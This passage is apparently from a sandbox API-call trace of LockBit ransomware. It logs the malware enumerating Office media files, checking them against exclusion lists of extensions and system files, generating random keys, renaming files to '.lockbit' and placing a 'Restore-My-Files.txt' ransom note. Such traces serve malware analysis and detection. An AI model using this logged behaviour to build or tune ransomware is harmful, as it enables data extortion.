param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.942] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0ddcb00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcacf0c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc0ddcb00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15134_.GIF", cAlternateFileName="")) returned 1 [0203.942] lstrcmpiW (lpString1=".", lpString2="BD15134_.GIF") returned -1 [0203.942] lstrcmpiW (lpString1="..", lpString2="BD15134_.GIF") returned -1 [0203.942] PathFindExtensionW (pszPath="BD15134_.GIF") returned=".GIF" [0203.942] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.942] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.942] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.943] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.943] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.943] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.943] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.943] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.943] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15134_.GIF") returned 1 [0203.943] lstrcmpiW (lpString1="ntldr", lpString2="BD15134_.GIF") returned 1 [0203.943] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15134_.GIF") returned 1 [0203.943] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15134_.GIF") returned 1 [0203.943] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15134_.GIF") returned -1 [0203.943] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15134_.GIF") returned 1 [0203.943] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15134_.GIF") returned 1 [0203.943] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.943] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15134_.GIF") returned=".GIF" [0203.943] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.944] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.944] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.944] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15134_.GIF.lockbit") returned 78 [0203.944] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15134_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15134_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.946] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.946] malloc (_Size=0x40068) returned 0x3df0008 [0203.946] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=177) returned 1 [0203.946] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.946] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.947] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.947] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.950] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15134_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15134_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.950] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.950] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.950] free (_Block=0x1fa2ed8) [0203.950] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15134_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.950] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.950] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.950] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0ddcb00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcacf0c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc0ddcb00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15135_.GIF", cAlternateFileName="")) returned 1 [0203.950] lstrcmpiW (lpString1=".", lpString2="BD15135_.GIF") returned -1 [0203.950] lstrcmpiW (lpString1="..", lpString2="BD15135_.GIF") returned -1 [0203.950] PathFindExtensionW (pszPath="BD15135_.GIF") returned=".GIF" [0203.950] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.950] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.950] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.950] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.950] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.950] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.950] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.950] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.950] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.950] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.950] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.950] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.950] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.950] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.950] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.950] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.951] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.951] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.951] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.951] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.951] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.951] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.951] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15135_.GIF") returned 1 [0203.951] lstrcmpiW (lpString1="ntldr", lpString2="BD15135_.GIF") returned 1 [0203.951] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15135_.GIF") returned 1 [0203.952] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15135_.GIF") returned 1 [0203.952] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15135_.GIF") returned -1 [0203.952] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15135_.GIF") returned 1 [0203.952] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15135_.GIF") returned 1 [0203.952] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.952] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15135_.GIF") returned=".GIF" [0203.952] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.952] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.952] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.952] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15135_.GIF.lockbit") returned 78 [0203.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15135_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15135_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.954] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.954] malloc (_Size=0x40068) returned 0x3df0008 [0203.954] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=175) returned 1 [0203.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.955] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.955] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15135_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15135_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.958] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.958] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.958] free (_Block=0x1fa2ed8) [0203.958] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15135_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.958] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.958] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc20ef800, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcaf5220, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc20ef800, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15136_.GIF", cAlternateFileName="")) returned 1 [0203.958] lstrcmpiW (lpString1=".", lpString2="BD15136_.GIF") returned -1 [0203.958] lstrcmpiW (lpString1="..", lpString2="BD15136_.GIF") returned -1 [0203.958] PathFindExtensionW (pszPath="BD15136_.GIF") returned=".GIF" [0203.958] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.958] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.958] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.958] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.958] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.958] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.958] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.958] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.958] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.958] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.958] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.958] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.959] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.959] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.959] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.959] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.959] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.959] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.959] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.959] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.960] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.960] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.960] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15136_.GIF") returned 1 [0203.960] lstrcmpiW (lpString1="ntldr", lpString2="BD15136_.GIF") returned 1 [0203.960] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15136_.GIF") returned 1 [0203.960] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15136_.GIF") returned 1 [0203.960] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15136_.GIF") returned -1 [0203.960] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15136_.GIF") returned 1 [0203.960] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15136_.GIF") returned 1 [0203.960] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.960] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15136_.GIF") returned=".GIF" [0203.960] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.960] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.960] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.960] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 